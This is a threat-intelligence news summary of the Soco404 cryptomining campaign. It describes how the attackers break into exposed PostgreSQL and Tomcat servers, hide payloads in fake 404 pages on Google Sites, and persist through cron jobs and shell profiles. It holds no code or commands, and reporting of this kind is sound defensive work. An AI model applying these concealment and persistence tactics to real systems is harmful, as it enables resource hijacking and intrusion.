Researchers from Wiz have uncovered a sophisticated cryptomining campaign, dubbed Soco404, that targets cloud environments by exploiting various vulnerabilities and misconfigurations. The attackers employ a unique method of embedding malicious payloads within fake 404 error pages hosted on Google Sites, demonstrating alarming ingenuity in cloud threat tactics.
Overview of the Soco404 Campaign
Soco404 represents an emerging threat campaign actively compromising cloud systems to deploy cryptominers, specifically focused on mining the privacy-centric cryptocurrency Monero. This campaign exploits a broad range of cloud environment weaknesses, including exposed services and poor configuration settings, to infiltrate both Linux and Windows platforms.
The campaign’s moniker, Soco404, derives from its use of counterfeit 404 error message pages as a vector to deliver encoded malicious payloads. These fake error pages are hosted on legitimate Google Sites domains, leveraging the trusted infrastructure to evade detection and deliver cryptomining software stealthily.
Attack Methodology and Techniques
- Target Platforms: Both Linux and Windows operating systems are targeted with tailored malware variants optimized for each environment.
- Exploitation Approach: Soco404 attackers conduct automated reconnaissance to identify vulnerable cloud services such as PostgreSQL databases and Apache Tomcat servers. Common weaknesses include default credentials, misconfigurations, and known unpatched vulnerabilities.
- Payload Delivery: Malicious payloads are concealed within fake 404 error pages hosted on Google Sites, making the initial infection vector appear innocuous and difficult to identify.
- Persistence Mechanisms:
- On Linux hosts, persistence is maintained through cron jobs and alterations to shell resource files (.bashrc, .profile).
- On Windows hosts, the malware leverages PowerShell scripts to download additional components while disabling logging to reduce forensic visibility.
- Camouflage: Malicious processes mimic legitimate system services to avoid raising suspicion during routine monitoring.
Impact and Financial Motivation
Infected systems are repurposed to mine Monero, which commandeers cloud computing resources and significantly increases operational costs for the victim organizations. Beyond resource hijacking, some domains linked to the campaign also masquerade as fraudulent cryptocurrency exchanges, suggesting a multifaceted financial fraud infrastructure.
Current Status and Response
Wiz researchers report that Soco404 remains active as of mid-2025, continuously evolving to circumvent detection.
